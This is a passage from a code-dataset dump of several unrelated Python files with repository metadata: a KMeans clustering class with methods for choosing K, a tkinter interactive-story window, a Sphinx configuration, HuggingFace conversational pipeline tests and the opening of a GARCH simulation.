nrefs: number of sample reference datasets to create
maxClusters: Maximum number of clusters to test for
Returns: (optimalK)
"""
gaps = np.zeros((len(range(1, maxClusters)),))
for gap_index, k in enumerate(range(1, maxClusters)):
# Holder for reference dispersion results
refDisps = np.zeros(nrefs)
# For n references, generate random sample and perform kmeans getting resulting dispersion of each loop
for i in range(nrefs):
# Create new random reference set
randomReference = np.random.random_sample(size=data.shape)
# Fit to it
km = camins(k)
km.fit(randomReference)
refDisp = km.inertia_
refDisps[i] = refDisp
# Fit cluster to original data and create dispersion
km = camins(k)
km.fit(data)
origDisp = km.inertia_
# Calculate gap statistic
gap = np.mean(np.log(refDisps)) - np.log(origDisp)
# Assign this loop's gap statistic to gaps
gaps[gap_index] = gap
return gaps.argmax() + 1 # Plus 1 because index of 0 means 1 cluster is optimal, index 2 = 3 clusters are optimal
def distance(X, C):
"""@brief Calculates the distance between each pixcel and each centroid
@param X numpy array PxD 1st set of data points (usually data points)
@param C numpy array KxD 2nd set of data points (usually cluster centroids points)
@return dist: PxK numpy array position ij is the distance between the
i-th point of the first set an the j-th point of the second set
"""
return euclidean_distances(X,C)
class KMeans():
def __init__(self, X, K, options=None):
"""@brief Constructor of KMeans class
@param X LIST input data
@param K INT number of centroids
@param options DICT dctionary with options
"""
self._init_X(X) # LIST data coordinates
self._init_options(options) # DICT options
self._init_rest(K) # Initializes de rest of the object
#############################################################
## THIS FUNCTION CAN BE MODIFIED FROM THIS POINT, if needed
#############################################################
def _init_X(self, X):
"""@brief Initialization of all pixels
@param X LIST list of all pixel values. Usually it will be a numpy
array containing an image NxMx3
sets X an as an array of data in vector form (PxD where P=N*M and D=3 in the above example)
"""
if len(X.shape) >= 3:
self.X = X.reshape(-1, X.shape[2]).astype(np.float64)
else:
self.X = np.copy(X.astype(np.float64))
def _init_options(self, options):
"""@brief Initialization of options in case some fields are left undefined
@param options DICT dctionary with options
sets de options parameters
"""
if options == None:
options = {}
if not 'km_init' in options:
options['km_init'] = 'first'
if not 'verbose' in options:
options['verbose'] = False
if not 'tolerance' in options:
options['tolerance'] = 0
if not 'max_iter' in options:
options['max_iter'] = np.inf
if not 'fitting' in options:
options['fitting'] = 'Fisher'
self.options = options
#############################################################
## THIS FUNCTION CAN BE MODIFIED FROM THIS POINT, if needed
#############################################################
def _init_rest(self, K):
"""@brief Initialization of the remainig data in the class.
@param options DICT dctionary with options
"""
self.K = K # INT number of clusters
if self.K > 0:
self._init_centroids() # LIST centroids coordinates
self.old_centroids = np.empty_like(self.centroids) # LIST coordinates of centroids from previous iteration
self.clusters = np.zeros(len(self.X)) # LIST list that assignes each element of X into a cluster
self._cluster_points() # sets the first cluster assignation
self.num_iter = 0 # INT current iteration
#############################################################
## THIS FUNCTION CAN BE MODIFIED FROM THIS POINT, if needed
#############################################################
def _init_centroids(self):
"""@brief Initialization of centroids
depends on self.options['km_init']
"""
if self.options['km_init'].lower() == 'first':
unique, index = np.unique(self.X,axis=0, return_index=True)
index = np.sort(index)
self.centroids = np.array(self.X[index[:self.K]])
elif self.options['km_init'].lower() == 'custom':
self.centroids = np.zeros((self.K,self.X.shape[1]))
for k in range(self.K): self.centroids[k,:] = k*255/(self.K-1)
elif self.options['km_init'] == 'kmeans++':
self.centroids = camins(n_clusters=self.K, init='k-means++', n_init=1, max_iter=1).fit(self.X).cluster_centers_
else:
maxtmp = self.X.max(axis=0)
mintmp = self.X.min(axis=0)
centroids = np.zeros((self.X.shape[1],self.K))
for i in range(self.X.shape[1]):
centroids[i] = np.random.uniform(low=mintmp[i],high=maxtmp[i],size=self.K)
self.centroids = np.array(centroids.transpose())
def _cluster_points(self):
"""@brief Calculates the closest centroid of all points in X
"""
self.clusters = pairwise_distances_argmin(self.X, self.centroids)
def _get_centroids(self):
"""@brief Calculates coordinates of centroids based on the coordinates
of all the points assigned to the centroid
"""
self.old_centroids = np.copy(self.centroids)
self.centroids = np.array([self.X[self.clusters == i].mean(0) for i in range(self.K)])
if np.isnan(self.centroids).any():
mask = np.where(np.isnan(self.centroids).all(axis=1))[0]
self.centroids[mask] = self.old_centroids[mask]
def _converges(self):
"""@brief Checks if there is a difference between current and old centroids
"""
return np.allclose(self.centroids, self.old_centroids, self.options['tolerance'])
def _iterate(self, show_first_time=True):
"""@brief One iteration of K-Means algorithm. This method should
reassigne all the points from X to their closest centroids
and based on that, calculate the new position of centroids.
"""
self.num_iter += 1
self._cluster_points()
self._get_centroids()
if self.options['verbose']:
self.plot(show_first_time)
def run(self):
"""@brief Runs K-Means algorithm until it converges or until the number
of iterations is smaller than the maximum number of iterations.=
"""
if self.K == 0:
self.bestK()
return
self._iterate(True)
self.options['max_iter'] = np.inf
if self.options['max_iter'] > self.num_iter:
while not self._converges():
self._iterate(False)
def bestK(self):
"""@brief Runs K-Means multiple times to find the best K for the current
data given the 'fitting' method. In cas of Fisher elbow method
is recommended.
at the end, self.centroids and self.clusters contains the
information for the best K. NO need to rerun KMeans.
@return B is the best K found.
"""
#######################################################
## YOU MUST REMOVE THE REST OF THE CODE OF THIS FUNCTION
## AND CHANGE FOR YOUR OWN CODE
#######################################################
centroids = []
clusters = []
bestk = 4
#self.options['fitting'] ='gap'
if self.options['fitting'].lower() == 'jump':
return self.jumpMethod(clusters,centroids)
elif self.options['fitting'].lower() == 'gap':
bestk = gap(self.X, maxClusters=14)
self._init_rest(bestk)
self.run()
return bestk
elif self.options['fitting'].lower() == 'fisher':
bestk, center = -1, []
fit, threshold = np.inf, 2.3
self._init_rest(2)
self.run()
center.append([self.fitting(), self.centroids, self.clusters])
self._init_rest(3)
self.run()
center.append([self.fitting(), self.centroids, self.clusters])
for k in xrange(4, 13 + 1):
self._init_rest(k)
self.run()
center.append([self.fitting(), self.centroids, self.clusters])
if (center[-3][0] - center[-2][0]) > (center[-2][0] - center[-1][0])*threshold:
self.centroids, self.clusters = center[-2][1:]
bestk = k - 1
break
else:
bestk = 4
self.centroids, self.clusters = center[bestk-2][1:]
self.K = bestk
return bestk
else:
scores = []
for k in range(2,14):
self._init_rest(k)
self.run()
scores.append(self.fitting())
centroids.append(self.centroids)
clusters.append(self.clusters)
if self.options['fitting'].lower() == 'calinski' or self.options['fitting'].lower() == 'silhouette':
bestk = np.argmax(scores)+2
self.centroids = centroids[bestk-2]
self.clusters = clusters[bestk-2]
self.K = bestk
return bestk
def fitting(self):
"""@brief return a value describing how well the current kmeans fits the data
"""
if self.K == 1:
return 1
elif self.options['fitting'].lower() == 'fisher' and self.K > 1:
return 1/(metricas.calinski_harabaz_score(self.X, self.clusters)*(self.K -1)/(self.X.shape[0]-self.K)) #calinski = (Between_Variance/Whithin_Variance)*(N-k)/(K-1)
elif self.options['fitting'].lower() == 'silhouette':
return metricas.silhouette_score(self.X,self.clusters)
elif self.options['fitting'].lower() == 'calinski':
return metricas.calinski_harabaz_score(self.X, self.clusters)
else:
return np.random.rand(1)
def jumpMethod(self, clusters, centroids):
data = self.X
# dimension of 'data'; data.shape[0] would be size of 'data'
p = data.shape[1]
# vector of variances (1 by p)
#using squared error rather than Mahalanobis distance' (SJ, p. 12)
sigmas = np.var(data, axis=0)
## by following the authors we assume 0 covariance between p variables (SJ, p. 12)
# start with zero-matrix (p by p)
Sigma = np.zeros((p, p), dtype=np.float32)
# fill the main diagonal with variances for
np.fill_diagonal(Sigma, val=sigmas)
# calculate the inversed matrix
Sigma_inv = np.linalg.inv(Sigma)
cluster_range = range(1, 13 + 1)
distortions = np.repeat(0, len(cluster_range) + 1).astype(np.float32)
# for each k in cluster range implement
for k in cluster_range:
# initialize and fit the clusterer giving k in the loop
self._init_rest(k)
self.run()
centroids.append(self.centroids)
clusters.append(self.clusters)
# calculate centers of suggested k clusters
centers = self.centroids
# since we need to calculate the mean of mins create dummy vec
for_mean = np.repeat(0, len(data)).astype(np.float32)
# for each observation (i) in data implement
for i in range(len(data)):
# dummy for vec of distances between i-th obs and k-center
dists = np.repeat(0, k).astype(np.float32)
# for each cluster in KMean clusters implement
for cluster in range(k):
# calculate the within cluster dispersion
tmp = np.transpose(data[i] - centers[cluster])
#using squared error rather than Mahalanobis distance' (SJ, p. 12)
dists[cluster] = tmp.dot(Sigma_inv).dot(tmp)
#dists[cluster] = tmp.dot(tmp)
# take the lowest distance to a class
for_mean[i] = min(dists)
# take the mean for mins for each observation
distortions[k] = np.mean(for_mean) / p
Y = p / 2
# the first (by convention it is 0) and the second elements
jumps = [0] + [distortions[1] ** (-Y) - 0]
jumps += [distortions[k] ** (-Y) \
- distortions[k-1] ** (-Y) \
for k in range(2, len(distortions))]
# calculate recommended number of clusters
bestK = np.argmax(np.array(jumps))
self.centroids = centroids[bestK-1]
self.clusters = clusters[bestK-1]
self.K = bestK
"""plt.figure(2)
plt.cla()
plt.plot(range(16),jumps)
plt.xlabel('K')
plt.ylabel('fitting score')
plt.draw()
plt.pause(20)"""
return bestK
def plot(self, first_time=True):
"""@brief Plots the results
"""
# markersshape = 'ov^<>1234sp*hH+xDd'
markerscolor = 'bgrcmybgrcmybgrcmyk'
if first_time:
plt.gcf().add_subplot(111, projection='3d')
plt.ion()
plt.show()
if self.X.shape[1] > 3:
if not hasattr(self, 'pca'):
self.pca = PCA(n_components=3)
self.pca.fit(self.X)
Xt = self.pca.transform(self.X)
Ct = self.pca.transform(self.centroids)
else:
Xt = self.X
Ct = self.centroids
for k in range(self.K):
plt.gca().plot(Xt[self.clusters == k, 0], Xt[self.clusters == k, 1], Xt[self.clusters == k, 2],
'.' + markerscolor[k])
plt.gca().plot(Ct[k, 0:1], Ct[k, 1:2], Ct[k, 2:3], 'o' + 'k', markersize=12)
if first_time:
plt.xlabel('dim 1')
plt.ylabel('dim 2')
plt.gca().set_zlabel('dim 3')
plt.draw()
plt.pause(0.01)
| [
"[email protected]"
] | |
0d59d8d0b71b7c382e97d7b56015fbfbbafc69d8 | 0227dab8e222d908d02d54ad13ec88b7f1f9ac1f | /AUTOMATAPROYECT-master/Front.py | 2d287391253e9ad5e29a2cb2152e4ae740d4d192 | [] | no_license | OrlandoMR/Automatas | 8c3a3e1fc3f45f6239a24ab2b03a5102b18a1a32 | a1213bf3ca6b7803d0aa82ce52947a86d31e0eca | refs/heads/master | 2021-10-25T10:01:25.564466 | 2019-04-03T19:47:59 | 2019-04-03T19:47:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,548 | py |
from tkinter import *
import os
#Interfaz gŕafica
#root widget
root = Tk()
root.title("Titulo de la historia")
root.resizable(False,False)
root.configure(bg="black")
#FirstFrame Creation
myFrame = Frame(root,width=500, height=400)
myFrame.pack()
myFrame.config(width="650", height="350")
myFrame.config(bd= 8,bg = "black")
myFrame.config(relief = "groove")
#LabelFirstText
textLabel = Label(myFrame, text="Hubo una época donde energía era sinónimo de suciedad," +
" encender las luces una importante elección, \nlas ciudades tenían apagones"+
" y los autos quemaban combustible para funcionar..."
, bg = "black", fg = "white", font=("Arial Unicode MS",15))
textLabel.grid(row= 0,column=1, padx=10, pady = 10)
#Image
img = PhotoImage(file='files/fondo.gif')#Reemplazar por función que pondra la imagen dependiendo del estado
imageLabel = Label(myFrame, image = img)
imageLabel.grid(row= 1,column=1, padx=10, pady = 10)
#Action Buttons
def actionYesButton():
print("Holaaaaa")
def actionNoButton():
print("AntiHola")
#Buttons
buttonNo = Button(myFrame, text="NO", bg = "black", fg = "green", font = (20),
width = 7, height =5, command = actionNoButton)
buttonNo.grid(row = 2,column = 0, padx = 10, pady = 10)
buttonYes = Button(myFrame, text="YES", bg = "black", fg = "green", font = (20),width = 7,
height =5, command = actionYesButton)
buttonYes.grid(row = 2, column = 3, padx = 10, pady = 10)
root.mainloop()
| [
"[email protected]"
] | |
e3ad3b767fbd0d6d7edf4729792f6b837616eec6 | fea389d72e4e458c183ca40ab695d46bc5da5015 | /OMG/source/conf.py | 5fa8d544b7b569b693f643fdf2e2ce745b869795 | [] | no_license | zhangdaoxun/ON-MY-GENE | dfae4f3f135215edb65f79ac6b11f5c7b7405bab | 674819e65894de4ed283649dd9fce66596b73831 | refs/heads/master | 2020-05-02T12:56:12.902829 | 2019-06-06T13:45:16 | 2019-06-06T13:45:16 | 177,971,218 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,225 | py | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'omg'
copyright = '2019, zhangxun'
author = 'zhangxun'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = ''
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'omgdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'omg.tex', 'omg Documentation',
'zhangxun', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'omg', 'omg Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'omg', 'omg Documentation',
author, 'omg', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| [
"[email protected]"
] | |
00c4fad7606971274a79c91af14dc8412935ba2e | c5becab2d4201f2e828d052c22b4496a3bbe4927 | /tests/pipelines/test_pipelines_conversational.py | 9ed32adda652d5983ed5995d8d94a7a0df5d635c | [
"Apache-2.0"
] | permissive | thomwolf/transformers | ba665c456b2acd636d8e3876a87ea446ae0ae092 | 166dfa88e5dfdca1d99197e5006e4e2ea9e49cba | refs/heads/master | 2023-03-08T03:37:13.519336 | 2023-02-15T15:00:01 | 2023-02-15T15:00:01 | 238,908,404 | 4 | 1 | Apache-2.0 | 2023-02-25T16:09:30 | 2020-02-07T11:40:04 | Python | UTF-8 | Python | false | false | 17,110 | py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import (
MODEL_FOR_CAUSAL_LM_MAPPING,
MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING,
TF_MODEL_FOR_CAUSAL_LM_MAPPING,
TF_MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING,
AutoModelForCausalLM,
AutoModelForSeq2SeqLM,
AutoTokenizer,
BlenderbotSmallForConditionalGeneration,
BlenderbotSmallTokenizer,
Conversation,
ConversationalPipeline,
TFAutoModelForCausalLM,
pipeline,
)
from transformers.testing_utils import require_tf, require_torch, slow, torch_device
from .test_pipelines_common import ANY, PipelineTestCaseMeta
DEFAULT_DEVICE_NUM = -1 if torch_device == "cpu" else 0
class ConversationalPipelineTests(unittest.TestCase, metaclass=PipelineTestCaseMeta):
model_mapping = dict(
list(MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.items())
if MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING
else [] + list(MODEL_FOR_CAUSAL_LM_MAPPING.items())
if MODEL_FOR_CAUSAL_LM_MAPPING
else []
)
tf_model_mapping = dict(
list(TF_MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.items())
if TF_MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING
else [] + list(TF_MODEL_FOR_CAUSAL_LM_MAPPING.items())
if TF_MODEL_FOR_CAUSAL_LM_MAPPING
else []
)
def get_test_pipeline(self, model, tokenizer, processor):
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
return conversation_agent, [Conversation("Hi there!")]
def run_pipeline_test(self, conversation_agent, _):
# Simple
outputs = conversation_agent(Conversation("Hi there!"))
self.assertEqual(outputs, Conversation(past_user_inputs=["Hi there!"], generated_responses=[ANY(str)]))
# Single list
outputs = conversation_agent([Conversation("Hi there!")])
self.assertEqual(outputs, Conversation(past_user_inputs=["Hi there!"], generated_responses=[ANY(str)]))
# Batch
conversation_1 = Conversation("Going to the movies tonight - any suggestions?")
conversation_2 = Conversation("What's the last book you have read?")
self.assertEqual(len(conversation_1.past_user_inputs), 0)
self.assertEqual(len(conversation_2.past_user_inputs), 0)
outputs = conversation_agent([conversation_1, conversation_2])
self.assertEqual(outputs, [conversation_1, conversation_2])
self.assertEqual(
outputs,
[
Conversation(
past_user_inputs=["Going to the movies tonight - any suggestions?"],
generated_responses=[ANY(str)],
),
Conversation(past_user_inputs=["What's the last book you have read?"], generated_responses=[ANY(str)]),
],
)
# One conversation with history
conversation_2.add_user_input("Why do you recommend it?")
outputs = conversation_agent(conversation_2)
self.assertEqual(outputs, conversation_2)
self.assertEqual(
outputs,
Conversation(
past_user_inputs=["What's the last book you have read?", "Why do you recommend it?"],
generated_responses=[ANY(str), ANY(str)],
),
)
with self.assertRaises(ValueError):
conversation_agent("Hi there!")
with self.assertRaises(ValueError):
conversation_agent(Conversation())
# Conversation have been consumed and are not valid anymore
# Inactive conversations passed to the pipeline raise a ValueError
with self.assertRaises(ValueError):
conversation_agent(conversation_2)
@require_torch
@slow
def test_integration_torch_conversation(self):
# When
conversation_agent = pipeline(task="conversational", device=DEFAULT_DEVICE_NUM)
conversation_1 = Conversation("Going to the movies tonight - any suggestions?")
conversation_2 = Conversation("What's the last book you have read?")
# Then
self.assertEqual(len(conversation_1.past_user_inputs), 0)
self.assertEqual(len(conversation_2.past_user_inputs), 0)
# When
result = conversation_agent([conversation_1, conversation_2], do_sample=False, max_length=1000)
# Then
self.assertEqual(result, [conversation_1, conversation_2])
self.assertEqual(len(result[0].past_user_inputs), 1)
self.assertEqual(len(result[1].past_user_inputs), 1)
self.assertEqual(len(result[0].generated_responses), 1)
self.assertEqual(len(result[1].generated_responses), 1)
self.assertEqual(result[0].past_user_inputs[0], "Going to the movies tonight - any suggestions?")
self.assertEqual(result[0].generated_responses[0], "The Big Lebowski")
self.assertEqual(result[1].past_user_inputs[0], "What's the last book you have read?")
self.assertEqual(result[1].generated_responses[0], "The Last Question")
# When
conversation_2.add_user_input("Why do you recommend it?")
result = conversation_agent(conversation_2, do_sample=False, max_length=1000)
# Then
self.assertEqual(result, conversation_2)
self.assertEqual(len(result.past_user_inputs), 2)
self.assertEqual(len(result.generated_responses), 2)
self.assertEqual(result.past_user_inputs[1], "Why do you recommend it?")
self.assertEqual(result.generated_responses[1], "It's a good book.")
@require_torch
@slow
def test_integration_torch_conversation_truncated_history(self):
# When
conversation_agent = pipeline(task="conversational", min_length_for_response=24, device=DEFAULT_DEVICE_NUM)
conversation_1 = Conversation("Going to the movies tonight - any suggestions?")
# Then
self.assertEqual(len(conversation_1.past_user_inputs), 0)
# When
result = conversation_agent(conversation_1, do_sample=False, max_length=36)
# Then
self.assertEqual(result, conversation_1)
self.assertEqual(len(result.past_user_inputs), 1)
self.assertEqual(len(result.generated_responses), 1)
self.assertEqual(result.past_user_inputs[0], "Going to the movies tonight - any suggestions?")
self.assertEqual(result.generated_responses[0], "The Big Lebowski")
# When
conversation_1.add_user_input("Is it an action movie?")
result = conversation_agent(conversation_1, do_sample=False, max_length=36)
# Then
self.assertEqual(result, conversation_1)
self.assertEqual(len(result.past_user_inputs), 2)
self.assertEqual(len(result.generated_responses), 2)
self.assertEqual(result.past_user_inputs[1], "Is it an action movie?")
self.assertEqual(result.generated_responses[1], "It's a comedy.")
@require_torch
def test_small_model_pt(self):
tokenizer = AutoTokenizer.from_pretrained("microsoft/DialoGPT-small")
model = AutoModelForCausalLM.from_pretrained("microsoft/DialoGPT-small")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
conversation = Conversation("hello")
output = conversation_agent(conversation)
self.assertEqual(output, Conversation(past_user_inputs=["hello"], generated_responses=["Hi"]))
@require_tf
def test_small_model_tf(self):
tokenizer = AutoTokenizer.from_pretrained("microsoft/DialoGPT-small")
model = TFAutoModelForCausalLM.from_pretrained("microsoft/DialoGPT-small")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
conversation = Conversation("hello")
output = conversation_agent(conversation)
self.assertEqual(output, Conversation(past_user_inputs=["hello"], generated_responses=["Hi"]))
@require_torch
@slow
def test_integration_torch_conversation_dialogpt_input_ids(self):
tokenizer = AutoTokenizer.from_pretrained("microsoft/DialoGPT-small")
model = AutoModelForCausalLM.from_pretrained("microsoft/DialoGPT-small")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
conversation_1 = Conversation("hello")
inputs = conversation_agent.preprocess(conversation_1)
self.assertEqual(inputs["input_ids"].tolist(), [[31373, 50256]])
conversation_2 = Conversation("how are you ?", past_user_inputs=["hello"], generated_responses=["Hi there!"])
inputs = conversation_agent.preprocess(conversation_2)
self.assertEqual(
inputs["input_ids"].tolist(), [[31373, 50256, 17250, 612, 0, 50256, 4919, 389, 345, 5633, 50256]]
)
@require_torch
@slow
def test_integration_torch_conversation_blenderbot_400M_input_ids(self):
tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot-400M-distill")
model = AutoModelForSeq2SeqLM.from_pretrained("facebook/blenderbot-400M-distill")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
# test1
conversation_1 = Conversation("hello")
inputs = conversation_agent.preprocess(conversation_1)
self.assertEqual(inputs["input_ids"].tolist(), [[1710, 86, 2]])
# test2
conversation_1 = Conversation(
"I like lasagne.",
past_user_inputs=["hello"],
generated_responses=[
" Do you like lasagne? It is a traditional Italian dish consisting of a shepherd's pie."
],
)
inputs = conversation_agent.preprocess(conversation_1)
self.assertEqual(
inputs["input_ids"].tolist(),
[
# This should be compared with the same conversation on ParlAI `safe_interactive` demo.
[
1710, # hello
86,
228, # Double space
228,
946,
304,
398,
6881,
558,
964,
38,
452,
315,
265,
6252,
452,
322,
968,
6884,
3146,
278,
306,
265,
617,
87,
388,
75,
341,
286,
521,
21,
228, # Double space
228,
281, # I like lasagne.
398,
6881,
558,
964,
21,
2, # EOS
],
],
)
@require_torch
@slow
def test_integration_torch_conversation_blenderbot_400M(self):
tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot-400M-distill")
model = AutoModelForSeq2SeqLM.from_pretrained("facebook/blenderbot-400M-distill")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
conversation_1 = Conversation("hello")
result = conversation_agent(
conversation_1,
)
self.assertEqual(
result.generated_responses[0],
# ParlAI implementation output, we have a different one, but it's our
# second best, you can check by using num_return_sequences=10
# " Hello! How are you? I'm just getting ready to go to work, how about you?",
" Hello! How are you doing today? I just got back from a walk with my dog.",
)
conversation_1 = Conversation("Lasagne hello")
result = conversation_agent(conversation_1, encoder_no_repeat_ngram_size=3)
self.assertEqual(
result.generated_responses[0],
" Do you like lasagne? It is a traditional Italian dish consisting of a shepherd's pie.",
)
conversation_1 = Conversation(
"Lasagne hello Lasagne is my favorite Italian dish. Do you like lasagne? I like lasagne."
)
result = conversation_agent(
conversation_1,
encoder_no_repeat_ngram_size=3,
)
self.assertEqual(
result.generated_responses[0],
" Me too. I like how it can be topped with vegetables, meats, and condiments.",
)
@require_torch
@slow
def test_integration_torch_conversation_encoder_decoder(self):
# When
tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot_small-90M")
model = AutoModelForSeq2SeqLM.from_pretrained("facebook/blenderbot_small-90M")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer, device=DEFAULT_DEVICE_NUM)
conversation_1 = Conversation("My name is Sarah and I live in London")
conversation_2 = Conversation("Going to the movies tonight, What movie would you recommend? ")
# Then
self.assertEqual(len(conversation_1.past_user_inputs), 0)
self.assertEqual(len(conversation_2.past_user_inputs), 0)
# When
result = conversation_agent([conversation_1, conversation_2], do_sample=False, max_length=1000)
# Then
self.assertEqual(result, [conversation_1, conversation_2])
self.assertEqual(len(result[0].past_user_inputs), 1)
self.assertEqual(len(result[1].past_user_inputs), 1)
self.assertEqual(len(result[0].generated_responses), 1)
self.assertEqual(len(result[1].generated_responses), 1)
self.assertEqual(result[0].past_user_inputs[0], "My name is Sarah and I live in London")
self.assertEqual(
result[0].generated_responses[0],
"hi sarah, i live in london as well. do you have any plans for the weekend?",
)
self.assertEqual(
result[1].past_user_inputs[0], "Going to the movies tonight, What movie would you recommend? "
)
self.assertEqual(
result[1].generated_responses[0], "i don't know... i'm not really sure. what movie are you going to see?"
)
# When
conversation_1.add_user_input("Not yet, what about you?")
conversation_2.add_user_input("What's your name?")
result = conversation_agent([conversation_1, conversation_2], do_sample=False, max_length=1000)
# Then
self.assertEqual(result, [conversation_1, conversation_2])
self.assertEqual(len(result[0].past_user_inputs), 2)
self.assertEqual(len(result[1].past_user_inputs), 2)
self.assertEqual(len(result[0].generated_responses), 2)
self.assertEqual(len(result[1].generated_responses), 2)
self.assertEqual(result[0].past_user_inputs[1], "Not yet, what about you?")
self.assertEqual(result[0].generated_responses[1], "i don't have any plans yet. i'm not sure what to do yet.")
self.assertEqual(result[1].past_user_inputs[1], "What's your name?")
self.assertEqual(result[1].generated_responses[1], "i don't have a name, but i'm going to see a horror movie.")
@require_torch
@slow
def test_from_pipeline_conversation(self):
model_id = "facebook/blenderbot_small-90M"
# from model id
conversation_agent_from_model_id = pipeline("conversational", model=model_id, tokenizer=model_id)
# from model object
model = BlenderbotSmallForConditionalGeneration.from_pretrained(model_id)
tokenizer = BlenderbotSmallTokenizer.from_pretrained(model_id)
conversation_agent_from_model = pipeline("conversational", model=model, tokenizer=tokenizer)
conversation = Conversation("My name is Sarah and I live in London")
conversation_copy = Conversation("My name is Sarah and I live in London")
result_model_id = conversation_agent_from_model_id([conversation])
result_model = conversation_agent_from_model([conversation_copy])
# check for equality
self.assertEqual(
result_model_id.generated_responses[0],
"hi sarah, i live in london as well. do you have any plans for the weekend?",
)
self.assertEqual(
result_model_id.generated_responses[0],
result_model.generated_responses[0],
)
| [
"[email protected]"
] | |
9d601337b6dc895c927f933e062c2575796415e6 | 2327d0bc2cc45a5504c39109846e0f4cba266606 | /QID-1799-SFEtimegarch/SFEtimegarch.py | 362457032fb2eddfb6adae28a3bbcca837f3cc90 | [] | no_license | QuantLet/SFE | 3d98a33cfcdc533210856c7618c32a78e111a6ce | d25a728a4371538eae982f44ea811b5b93328828 | refs/heads/master | 2022-06-15T13:35:17.387252 | 2022-06-08T01:22:00 | 2022-06-08T01:22:00 | 72,103,182 | 12 | 32 | null | 2022-01-30T18:58:21 | 2016-10-27T11:50:43 | R | UTF-8 | Python | false | false | 702 | py | import numpy as np
import matplotlib.pyplot as plt
#
np.random.seed(1234)
#omega = 0.1, alpha = 0.15, beta = 0.8
n=1000 # number of observations
n1=100 # drop first observations
alpha=(0.1,0.3) # GARCH (1,1) coefficients alpha0 and alpha1
beta=0.8
errors=np.random.normal(0,1,n+n1)
t=np.zeros(n+n1)
t[0]=np.random.normal(0,np.sqrt(alpha[0]/(1-alpha[1])),1)
#iterate over the oberservations
